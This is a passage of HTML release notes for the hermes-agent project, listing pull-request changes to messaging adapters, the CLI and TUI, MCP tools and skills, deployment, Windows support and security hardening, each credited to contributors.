<li>Discord: propagate <code>role_authorized</code> so <code>DISCORD_ALLOWED_ROLES</code> works end-to-end; recover from runtime gateway task exits; cancel <code>_bot_task</code> on connect failure; stop typing after replies (<a href="https://github.com/NousResearch/hermes-agent/pull/43327" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43327/hovercard">#43327</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44383" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44383/hovercard">#44383</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44432" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44432/hovercard">#44432</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44836" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44836/hovercard">#44836</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Slack: scope top-level channel messages when <code>reply_in_thread=false</code>; thread approval UX (block-size overflow + typed-prefix); make video attachments available to agents; <code>register_slack_action_handler</code> plugin API (<a href="https://github.com/NousResearch/hermes-agent/pull/41703" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41703/hovercard">#41703</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43444" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43444/hovercard">#43444</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45512" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45512/hovercard">#45512</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44664" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44664/hovercard">#44664</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Replied-to media attachments included; document attachments classified as DOCUMENT on Signal/Email/SimpleX/Teams; WhatsApp restarts stale bridge processes; Matrix room-context isolation; QQbot CPU-spin fix; Weixin rate-limit circuit breaker (<a href="https://github.com/NousResearch/hermes-agent/pull/46107" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46107/hovercard">#46107</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44695" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44695/hovercard">#44695</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44205" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44205/hovercard">#44205</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/18505" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/18505/hovercard">#18505</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40574" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40574/hovercard">#40574</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41718" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41718/hovercard">#41718</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/banditburai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/banditburai">@banditburai</a>)</li>
</ul>
<h2>🖥️ CLI, TUI &amp; Setup</h2>
<ul>
<li><code>/version</code> slash command; <code>/billing</code> interactive terminal billing (TUI + CLI); show time since last final agent response on the status bar; persist resolved approval/clarify prompts in scrollback (<a href="https://github.com/NousResearch/hermes-agent/pull/40214" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40214/hovercard">#40214</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45449" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45449/hovercard">#45449</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44265" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44265/hovercard">#44265</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44702" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44702/hovercard">#44702</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Lock hermes worktrees so concurrent processes can't clobber them; display custom profile alias names in list/show; clone profiles from any source (<a href="https://github.com/NousResearch/hermes-agent/pull/48699" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48699/hovercard">#48699</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40371" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40371/hovercard">#40371</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45630" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45630/hovercard">#45630</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Opt-in structured profile-build path on first contact; configurable per-platform system-prompt hints; configurable background memory/skill notifications (<a href="https://github.com/NousResearch/hermes-agent/pull/41114" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41114/hovercard">#41114</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48630" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48630/hovercard">#48630</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47226/hovercard">#47226</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>TUI: interactive Plugins Hub enable/disable overlay; session name in the terminal titlebar; paint approval/clarify/sudo/secret modals directly (not via throttle); wrap long approval commands instead of truncating (<a href="https://github.com/NousResearch/hermes-agent/pull/42965" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42965/hovercard">#42965</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43188" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43188/hovercard">#43188</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41155" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41155/hovercard">#41155</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44691" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44691/hovercard">#44691</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>TTS: Gemini persona prompts + audio tags; xAI auto speech tags + speed/streaming knobs; Piper speaker_id; OGG for Telegram auto-TTS (<a href="https://github.com/NousResearch/hermes-agent/pull/43442" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43442/hovercard">#43442</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49061" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49061/hovercard">#49061</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49062" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49062/hovercard">#49062</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49060" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49060/hovercard">#49060</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41644" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41644/hovercard">#41644</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔧 Tool System, Skills &amp; MCP</h2>
<ul>
<li><strong>image-to-image / editing</strong> in <code>image_generate</code> across all backends; shrink images to provider dimension limit (<a href="https://github.com/NousResearch/hermes-agent/pull/48705" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48705/hovercard">#48705</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45979" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45979/hovercard">#45979</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>MCP: official <strong>Unreal Engine 5.8</strong> MCP server in the catalog; <strong>elicitation handler</strong> so MCP servers can prompt for mid-tool-call confirmation (payment/OAuth) on whichever surface owns the session — CLI/TUI/Telegram/Slack; expose late-connecting MCP tools to the agent between turns (cache-safe); keepalive ping for short-TTL HTTP sessions; block exfil-shaped / suspicious stdio configs before probe; capability-gate <code>tools/list</code> so prompt-only servers connect; preserve stdio argv passthrough + Windows env vars (<a href="https://github.com/NousResearch/hermes-agent/pull/48397" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48397/hovercard">#48397</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49203" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49203/hovercard">#49203</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49208" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49208/hovercard">#49208</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49221" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49221/hovercard">#49221</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46083" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46083/hovercard">#46083</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44550" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44550/hovercard">#44550</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44324" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44324/hovercard">#44324</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lgalabru/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lgalabru">@lgalabru</a>)</li>
<li>Skills: <code>simplify-code</code> skill (parallel 3-agent code review &amp; cleanup) + risk-tiered application with Chesterton's Fence; find &amp; diff user-modified bundled skills; optional <strong>payments</strong> skills (Stripe Link, MPP, Projects); CLI-based shop skill; live per-source browse progress (<a href="https://github.com/NousResearch/hermes-agent/pull/41691" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41691/hovercard">#41691</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49070" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49070/hovercard">#49070</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48286/hovercard">#48286</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/31343" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/31343/hovercard">#31343</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47309" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47309/hovercard">#47309</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43398" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43398/hovercard">#43398</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/colinwren-stripe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/colinwren-stripe">@colinwren-stripe</a>)</li>
<li>Curator: make skill consolidation opt-in (prune stays default-on) (<a href="https://github.com/NousResearch/hermes-agent/pull/47840" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47840/hovercard">#47840</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Plugins: install from a subdirectory within a repo; accept browser-pasted GitHub URLs in <code>hermes plugins install</code>; <code>session:compress</code> lifecycle event + <code>thread_id</code>/<code>chat_type</code> in agent:start/end context (<a href="https://github.com/NousResearch/hermes-agent/pull/42963" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42963/hovercard">#42963</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/33539" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/33539/hovercard">#33539</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47252" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47252/hovercard">#47252</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41672" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41672/hovercard">#41672</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Memory/skill <strong>write approval</strong> gate (default off) — boolean <code>write_approval</code> replaces the tri-state <code>write_mode</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/38199" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38199/hovercard">#38199</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43354" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43354/hovercard">#43354</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🌐 Fleet, Relay &amp; Automation</h2>
<ul>
<li><strong>Managed scope</strong> — administrator-pinned, user-immutable config &amp; secrets from a root-owned <code>/etc/hermes</code> (<a href="https://github.com/NousResearch/hermes-agent/pull/49098" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49098/hovercard">#49098</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li><strong>Multiplex all profiles over one gateway process</strong> (opt-in) (<a href="https://github.com/NousResearch/hermes-agent/pull/48273" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48273/hovercard">#48273</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li><strong>Pluggable CronScheduler</strong> + Chronos managed-cron provider (scale-to-zero) (<a href="https://github.com/NousResearch/hermes-agent/pull/48275" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48275/hovercard">#48275</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>)</li>
<li><strong>Automation Blueprints</strong> — parameterized automation templates across every surface (<a href="https://github.com/NousResearch/hermes-agent/pull/41309" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41309/hovercard">#41309</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Gateway-Gateway relay (phases 0-3): relay adapter + capability descriptor, connector⇄gateway channel auth + signed-HTTP inbound + enroll CLI, WS-only inbound, managed-boot self-provision client (<a href="https://github.com/NousResearch/hermes-agent/pull/48078" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48078/hovercard">#48078</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48147" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48147/hovercard">#48147</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48294" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48294/hovercard">#48294</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48242" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48242/hovercard">#48242</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🐳 Docker, Nix &amp; Installer</h2>
<ul>
<li>s6: detect supervisor directly for gateway restart; register profile gateways without auto-starting; persist desired state; clear stale log locks (<a href="https://github.com/NousResearch/hermes-agent/pull/46290" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46290/hovercard">#46290</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46266" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46266/hovercard">#46266</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46292" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46292/hovercard">#46292</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46289" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46289/hovercard">#46289</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Docker: optimize image size (.dockerignore, drop dev deps, split layers); pre-install matrix deps; supervised gateway uses <code>--replace</code>; harden hosted install tree against self-modification (<a href="https://github.com/NousResearch/hermes-agent/pull/38749" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/38749/hovercard">#38749</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42413" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42413/hovercard">#42413</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47555" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47555/hovercard">#47555</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/47490" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/47490/hovercard">#47490</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Nix: cold npm build fixes + auto-fix-lockfiles workflow; hashless npm deps via <code>importNpmLock</code>; refresh npmDepsHash after Electron 40.10.2 pin (<a href="https://github.com/NousResearch/hermes-agent/pull/41867" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41867/hovercard">#41867</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48883" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48883/hovercard">#48883</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48457" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48457/hovercard">#48457</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Installer: clear unmerged git index before autostash; scope install-method stamp to the code tree (<a href="https://github.com/NousResearch/hermes-agent/pull/45515" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45515/hovercard">#45515</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48188" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48188/hovercard">#48188</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🔒 Security &amp; Reliability</h2>
<ul>
<li>Fail closed on own-policy gateway adapters; fail closed for approval-button auth on Slack/Feishu/Discord when no allowlist is set (<a href="https://github.com/NousResearch/hermes-agent/pull/45634" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45634/hovercard">#45634</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41226" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41226/hovercard">#41226</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Redact secrets in request debug dumps; withhold host metadata from public status; block exfil-shaped / suspicious MCP stdio configs before probe (<a href="https://github.com/NousResearch/hermes-agent/pull/46637" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46637/hovercard">#46637</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45642" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45642/hovercard">#45642</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46083" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46083/hovercard">#46083</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Close shell-escape denylist bypass + fail-closed on missing approval module; scrub operator environment before launching cua-driver MCP; sanitize env for cron job-script subprocesses; bound TodoStore content length/count; scan REST cron prompts for parity with the agent tool (<a href="https://github.com/NousResearch/hermes-agent/pull/40591" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40591/hovercard">#40591</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48423" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48423/hovercard">#48423</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/49207" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/49207/hovercard">#49207</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41648" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41648/hovercard">#41648</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41335" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41335/hovercard">#41335</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>)</li>
<li>Bump urllib3 and PyJWT to clear CVEs; Langfuse redacts base64 data URIs instead of truncating into invalid base64 (<a href="https://github.com/NousResearch/hermes-agent/pull/40179" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40179/hovercard">#40179</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/43322" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/43322/hovercard">#43322</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🪟 Windows</h2>
<ul>
<li>Dashboard <code>/chat</code> tab via ConPTY (<code>win_pty_bridge</code>) + tests; resolve PowerShell host instead of bare <code>powershell</code> for uv install; resolve <code>powershell.exe</code> by absolute path so Desktop install doesn't stall (<a href="https://github.com/NousResearch/hermes-agent/pull/42251" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42251/hovercard">#42251</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/48341" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/48341/hovercard">#48341</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40927" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40927/hovercard">#40927</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>Repair stale winget registration + refresh/merge PATH; kill hermes before recreating venv to release <code>_bcrypt.pyd</code> lock; read HERMES_HOME from the registry when env is stale; quarantine running <code>hermes.exe</code> during update repair (<a href="https://github.com/NousResearch/hermes-agent/pull/44084" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44084/hovercard">#44084</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/45120" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/45120/hovercard">#45120</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/46772" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/46772/hovercard">#46772</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40409" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40409/hovercard">#40409</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
<li>JOB-breakaway watcher reliability + status --deep probes; handle Windows PTY stdin + detached WS frames; decode subprocess output as UTF-8; confirm-modal on native Windows (<a href="https://github.com/NousResearch/hermes-agent/pull/40909" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40909/hovercard">#40909</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/41953" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41953/hovercard">#41953</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/44328" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/44328/hovercard">#44328</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/42419" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/42419/hovercard">#42419</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
</ul>
<h2>🐛 Notable Bug Fixes</h2>
<ul>
<li>Percent-encode non-ascii URL components; sanitize <code>:</code> in FTS5 queries so colon searches don't silently return empty (<a href="https://github.com/NousResearch/hermes-agent/pull/41430" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/41430/hovercard">#41430</a>, <a href="https://github.com/NousResearch/hermes-agent/pull/40653" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/40653/hovercard">#40653</a> — <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teknium1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teknium1">@teknium1</a>)</li>
